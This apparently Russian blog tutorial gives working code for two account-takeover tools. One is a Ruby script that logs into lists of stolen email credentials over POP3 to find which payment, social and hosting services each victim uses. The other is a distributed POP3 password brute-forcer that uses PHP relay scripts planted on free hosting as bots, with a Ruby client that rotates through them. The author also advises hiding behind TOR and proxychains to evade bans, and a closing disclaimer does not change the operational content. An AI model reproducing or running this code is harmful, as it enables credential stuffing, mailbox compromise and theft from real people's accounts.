суть вкратце

Читаем поочередно из файла логины и пароли от почт, после чего заходим на них по POP3.

Далее проходимся по всем сообщениям и если это сообщение от нужного нам адреса, например Вконтакте.Ру (admin@vkontakte.ru), то добавляем этот логин в нужный список, удаляем из массива этого адресата и идем по его сообщениям дальше. Сканирование одной почты продолжается до тех пор пока не кончатся все адресаты или не закончатся сообщения в почте. Далее берем следующий e-mail.

скрипт

Скрипт написан на Ruby и работает как на версии 1.8, так и на 1.9. Пробовал его только на Linux, но подозреваю, что на Windows он тоже будет прекрасно работать.

получение параметров и начальная настройка

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

#!/usr/bin/ruby
require 'net/pop'
 
if ARGV.size!=3
  puts "<infile> <logfile> <start no>"
  exit
end
 
$infile,$logfile,$start_no=ARGV
$start_no=$start_no.to_i
 
$service=['torrents.ru','tfile.ru','skype.com',
  'ozon.ru','odnoklassniki.ru','smartpay.com.ua',
  'vkontakte.ru', 'webmoney.ru','moneybookers.com',
  'e-gold.com','e-port.ru','agava.ru',
  'hoster.ru','dinohost.ru','eskhosting.ru',
  'infobox.ru','zemskov.ru','art-host.ru']

Итак, скрипт получает в командной строке 3 параметра:

1. файл, содержащий почты и пароли от них в формате mail@example.ru:passwd, причем каждая почта на новой строке
2. файл лога, сюда будут записываться все почты, к которым не удалось авторизоваться  и другие ошибки
3. номер почты в $infile, с которой нужно начать работу. Нумерация с нуля.

Далее идет массив, содержащий сервисы на которые будут сканироваться аккаунты почт. Смысл здесь в домене т.е. сюда нужно добавлять домены с которых высылаются e-mail’ы этих сервисов.

некоторые неключевые функции

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

def exist(str,file)
  outf=File.open(file,'a')
  outf.puts "#{Time.now}: #{str}"
  outf.close
end
 
def log(text,file)
  logf=File.open(file,'a')
  logf.puts "#{Time.now}: #{text}"
  logf.close
  puts "#{Time.now}: #{text}"
end
 
def check_letter(head,service)
  service.each_with_index {|se,i| return i if head.include?(se)}
  return -1
end

Немного объясню функции:

• exist – записывает аккаунт почты в файл одноименный с доменом сервиса, в случае если почта зарегистрирована в этом сервисе
• log – записывает сообщение в файл лога
• check_letter – проверяет заголовок письма на наличие домена сервиса, обходя массив сервисов. В случае если письмо отправлено от нужного домена возвращает индекс этого домена в массиве, в противном случае возвращает -1.

функция сканирования почты

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57

def check(mail,pass,service)
    # разбиваем почтовый адрес @, на логин и домен
    login,pop_server=mail.split('@')
    pop_server='pop.'+pop_server
    count_reg=0
 
    begin
        pop=Net::POP3.new(pop_server)
    rescue => e
        return -2
    end#begin
 
    # соединяемся с POP3-сервером
    begin
        pop.start(login,pass)
    rescue => e
      return -1
    end#begin
 
    begin
    # обходим письма в почте
    pop.mails.each do |msg|
        hed=msg.header
        STDOUT.flush
 
        if (si=check_letter(hed,service))>=0
	  print '!' ###
          exist("#{mail}/#{pass}",service[si])
          # удаляем сервис из экземпляра
          # индивидуального массива сервисов
          # для данной почты
          service.delete_at(si)
          count_reg+=1
          if service.size==0
            pop.finish
            return count_reg
          end#if
 
        else
	   print '.'
	end#if
 
    end#each
    rescue EOFError
      pop.finish
      return -4
    rescue Timeout::Error
      pop.finish
      return -3
    rescue Net::POPError
      pop.finish
      return -5
    end#begin
 
    pop.finish
    return count_reg
end#def

Тут следует кое-что учесть. Эта функция в самом своем начале разбивает e-mail адрес на логин @ домен, после чего адрес POP3-сервера получается из суммы ‘pop.’+домен.
Такая схема работает для бесплатных обывательских почт типа: mail.ru, rambler.ru, yandex.ru, hotmail.com итд. Однако, если почта не от популярных сервисов бесплатных почт, то адрес POP3-сервера может быть какой угодно.
Также нужно знать, если домен настроен, например, в услуге Яндекса ‘Почта для домена’, то логин будет равен адресу почты целиком, а не только его первая часть до собаки (@).

обход исходного файла

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

inf=File.open($infile,'r')
i=0
# крутим файл до заданной начальной строки
while(i<$start_no) do
  str=inf.gets
  i+=1
end
 
# построчно обходим файл
while !inf.eof do
  str=inf.gets.chop!
  print "#{i})#{str} checking..." ###
  STDOUT.flush
  ret=check(str.split(":")[0],str.split(":")[1],$service).to_i
  case ret
    when -3
      log("Unknow time is out #{str}",$logfile)
    when -2
      log("Can't connect to the server #{str}",$logfile)
    when -1
      log("Can't auth #{str}",$logfile)
    when 0
      puts "FAIL #{str}"
    else
      puts "#{Time.now}: #{str} SUCCESS #{ret}"
  end
  i+=1
end
inf.close

Ну тут все просто и примитивно.

заключение

Следует помнить, что доступ по POP3 вообще может быть отключен у почты, в этом случае почта будет добавлен в лог, как имеющая не верный пароль. Помимо этого если в списке много раз будет не проходить авторизация, то тот или иной POP3-сервер может забанить ваш IP за брутфорс, чтобы такого не было рекомендую запускать скрипт через известную связку TOR-Privoxy-Proxychains.

Целиком скрипт можно скачать тут - check_mail_for_diff_accs.rb.

Ниже я покажу как можно бесплатно (обычные брутфорсы обычно работают через прокси/соксы, которые либо бесплатные и очень долгие, либо платные) и главное быстро перебирать пароли к ящикам.
Моя первоначальная идея состояла в организации злой бот-сети из фрихостов, но об этом я расскажу в другой статье, пока лишь ограничимся одной функцией бота – попытка авторизации на POP3-сервере.

Итак, для начала нам нужен какой-нибудь бесплатный хостинг с поддержкой PHP5, версия должна быть именно пятая, в противном случае придется немного переписать серверные скрипты.
Допустим вы нашли фрихостинг, коих сейчас немерянно, и можно приступать к самому приложению, которое будет представляеть из себя многопоточный брутфорс списка мыл на популярные пароли. Если кому-то нужно иначе, клиентскую часть легко переписать на свой лад.

Брутфорс будет состоять из 2-х частей:

1. серверная – PHP-скрипты, которые будут по запросу клиента пытатся авторизоватся с заданным логином и паролем
2. клиентская – Ruby-скрипты, которые будут давать запрос, с указанием логина и пароля, по которым необходимо авторизоватся

Сервер (PHP-скрипты).

Сервер будет состоять из 3-х файлов:

1. библиотека – lib.php
2. конфигурация – config.php
3. сам скрипт авторизации – brut.php

В библиотеки lib.php содержится класс Email, который через функцию fsockopen() будет общатся с POP3-сервером. Взят именно такой принцип, а не скажем уже готовая mail() т.к. на более-менее нормальных хостингах подобные штуки отключены, запрещены и являются признаком преступления против человечества.

Итак, сам lib.php:

<?php
class Email {
var $server;
var $full_addr;
var $login;
const SOCK_ERR=-3;
const FST_GET_ERR=-2;
const LOGIN_ERR=-1;
const INCCORECT_PASS=0;
const SUCC=1;

function __construct($addr)
{$this->full_addr=$addr;
$this->set_serv();
$this->set_login(); }

private function set_serv ()
{$strpos=strpos($this->full_addr,’@');
$this->server=”pop.” . substr($this->full_addr,$strpos+1,strlen($this->full_addr)-$strpos); }

private function set_login ()
{$this->login=substr($this->full_addr,0,strpos($this->full_addr,’@')); }

public function try_auth ($pass)
{ $pop_conn = fsockopen($this->server, 110,$errno, $errstr, 10);
if (!(is_resource($pop_conn))) return -3;

$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -2;

fputs($pop_conn,”USER $this->login\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -1;

fputs($pop_conn,”PASS $pass\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))return 0;

fclose($pop_conn);
return 1;
}
}
?>

Далее файл config.php, он не отличается сложностью и представляет из себя 2 переменные хранящие логин и пароль админа брутфорса, мы же хотим единолично пользоватся нашим брутом.

<?php
$login=”root”;
$pass=”jvgfdhg6hj”;
?>

Теперь перейдем к brut.php, который и будет промежуточным звеном между нашей клиентской частью и POP3-сервером.

<?php
include ‘lib.php’;
include ‘config.php’;

if (!isset($_POST['login']) || $_POST['login']!=$login) die();
if (!isset($_POST['pass']) || $_POST['pass']!=$pass) die();
if (!(isset($_POST['op_addr'])) || !(isset($_POST['op_pass']))) die();

$email= new Email($_POST['op_addr']);
echo ‘<ans>’.$email->try_auth($_POST['op_pass']).’</ans>’;
?>

brut.php тоже не является верхом сложности программирования на PHP: сначала мы проверяем логин и пароль админа, затем смотрим присутствуют ли адрес почты и предполагаемый пароль к ней, и в случае если все ништяк пробуем авторизоватся, посредством заранее написанного класса. В конце мы выводим числовой ответ. Тот кому нужны точные ответы  посмотрит lib.php, а я же скажу что 0 – пароль не подошел, 1 – пароль подошел.

На этом с серверной частью закончили, теперь берем эти 3 файла и заливаем на все фрихосты, где удалось зарегать.

Клиент (Ruby-скрипты).

Клиентская часть состоит из 2-х скриптов:

1. config.rb – файл конфигурации
2. main.rb – собственно сам клиент

Сначала рассмотрим кофиг. Представляет он из себя следующее:

#!/usr/bin/ruby

$servers=['lukmus.ru','second.server.ru','third.server.ru','etc.freehost.com']
$path=’/mailbrut/brut.php’

$login=”root”
$pass=”jvgfdhg6hj”

$th_count=3

$fl_addrs=”mail_list”
$fl_log=”mailbrut.log”
$fl_good=”good_accs”

$passes=['pass','qwerty','123456','12345','etc...']

Теперь разберемся в нем:

• $servers – здесь пишем наши фризосты
• $path – путь на фрихостинге до нашей серверной части, на всех сайтах должен быть один и тот же
• $login и $pass – пароль админа брута, должен совпадать с указанными в config.php в серверной части
• $th_count – количество потоков брутфорса, он же у нас многопоточный
• $fl_addrs – файл, записаны почтовые адреса которые мы брутим. Каждая запись должна начинатся с новой строки.
• $fl_log – лог, сюда пишутся все ошибки
• $fl_good – здесь будут сохранятся удачно сбрученные почтовые акки в виде login:pass
• $passes – записываем пароли, на которые брутим

А теперь рассмотрим сам скрипт, который будет выдавать запросы нашим хостингам.

main.rb:

#!/usr/bin/ruby
require ‘net/http’
require ‘config.rb’

class WEB_Server
def initialize (servers)
@servers=servers
@i=0
end#def
def next_s
server=@servers[@i]
@i+=1
if @i>=@servers.size then @i=0 end
return server
end#def
end#class

def log(logfl,msg)
mess=”#{Time.now} <-> #{msg}”
logf=File.new(logfl,’a')
logf.puts mess
logf.close
puts mess
end#def

puts “Lukmus PHP-Ruby WebMailBrut starting…”

servers=WEB_Server.new($servers)
accs=File.new($fl_addrs,’r')
while !accs.eof do
op_addr=accs.gets.chop
while Thread.list.size>$th_count do sleep(1) end
th=Thread.new(op_addr) do |p_addr|
$passes.each do |p_pass|
serv=servers.next_s
http = Net::HTTP.new(serv, 80)
data = “login=#{$login}&pass=#{$pass}&op_addr=#{p_addr}&op_pass=#{p_pass}”
headers = { ‘Content-Type’ => ‘application/x-www-form-urlencoded’}
resp, data = http.post($path, data, headers)
ans=data.split(‘<ans>’)[1].split(‘</ans>’)[0]
case ans
when ‘-3′
log($fl_log,”ERR #3 Can’t open socket <-> #{p_addr}:#{p_pass}”)
when ‘-2′
log($fl_log,”ERR #2 Can’t connect to server <-> #{p_addr}:#{p_pass}”)
when ‘-1′
log($fl_log,”ERR #1 Can’t input login <-> #{p_addr}:#{p_pass}”)
when ’0′
puts “#{serv} <-> #{p_addr}:#{p_pass} <-> invalid pass”
when ’1′
log($fl_good,”#{serv} <-> #{p_addr}:#{p_pass} <-> SUCCESS”)
break

end#case
#http.close
end#each
end#thread
end#while
th.join

Он работает по следующему принципу:

• ОСНОВНОЙ ПОТОК: открывает файл со списком адресов и берет первый
• ОСНОВНОЙ ПОТОК: создает поток, который будет работать с этим адресом
• ПОТОК: берет первый пароль из нашего списка
• ПОТОК: берет первый хостинг и посылает запрос серверу на попытку авторизации
• ПОТОК: далее берет следующий хостинг и следующий пароль и так далее
• ОСНОВНОЙ ПОТОК: берет следующее мыло из списка и создает новый поток под него и так далее.

В случае если поток находит правильный пароль, то поток самоуничтожается, тем самым пресекая бессмысленные попытки авторизации с оставшимися, заведомо ложными паролями.

Ну вот и все, как запустить скрипт Ruby можно прочитать здесь, а скачвть все это дело одним архивом можно здесь

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.